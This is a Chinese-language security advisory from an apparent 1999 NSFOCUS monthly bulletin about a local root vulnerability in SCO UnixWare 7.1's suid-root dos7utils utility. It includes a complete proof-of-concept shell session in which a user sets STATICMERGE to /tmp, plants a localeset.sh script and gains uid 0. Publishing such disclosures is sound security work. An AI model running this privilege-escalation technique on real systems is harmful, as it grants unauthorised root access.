首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第2期->最新漏洞
期刊号: 类型: 关键词:
SCO UnixWare 7.1 /usr/lib/merge/dos7utils 本地漏洞

作者:Brock Tellier
日期:1999-10-15


概述:
    在SCO UnixWare's dos utilities package中含有漏洞,这个包允许用户或者管理员在Unix操作系统下运行基于Dos和Windows下的程序。工具集中的一个包(dos7utils)包含了一个拥有执行程序能力的用户获取Root权限的漏洞。

漏洞描述:
     在程序/usr/lib/merge/dos7utils(suid root by default)允许一些用户以Root身份执行命令。Dos7utils程序从环境变量STATICMERGE获取他的 localeset.sh 执行路径。我们通过一个可写的目录来设置这些,然后使用-f 参数,我们可以利用 dos7utils 运行如下程序:

bash-2.02$ uname -a; id; pwd
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
uid=101(xnec) gid=1(other)
/usr/lib/merge
bash-2.02$ export STATICMERGE=/tmp
bash-2.02$ cat > /tmp/localeset.sh
#!/bin/sh
id
bash-2.02$ chmod 700 /tmp/localeset.sh
bash-2.02$ ./dos7utils -f bah
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),
8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)


解决方法:
    到http://www.sco.com站点寻找最新的漏洞补丁。


版权所有,未经许可,不得转载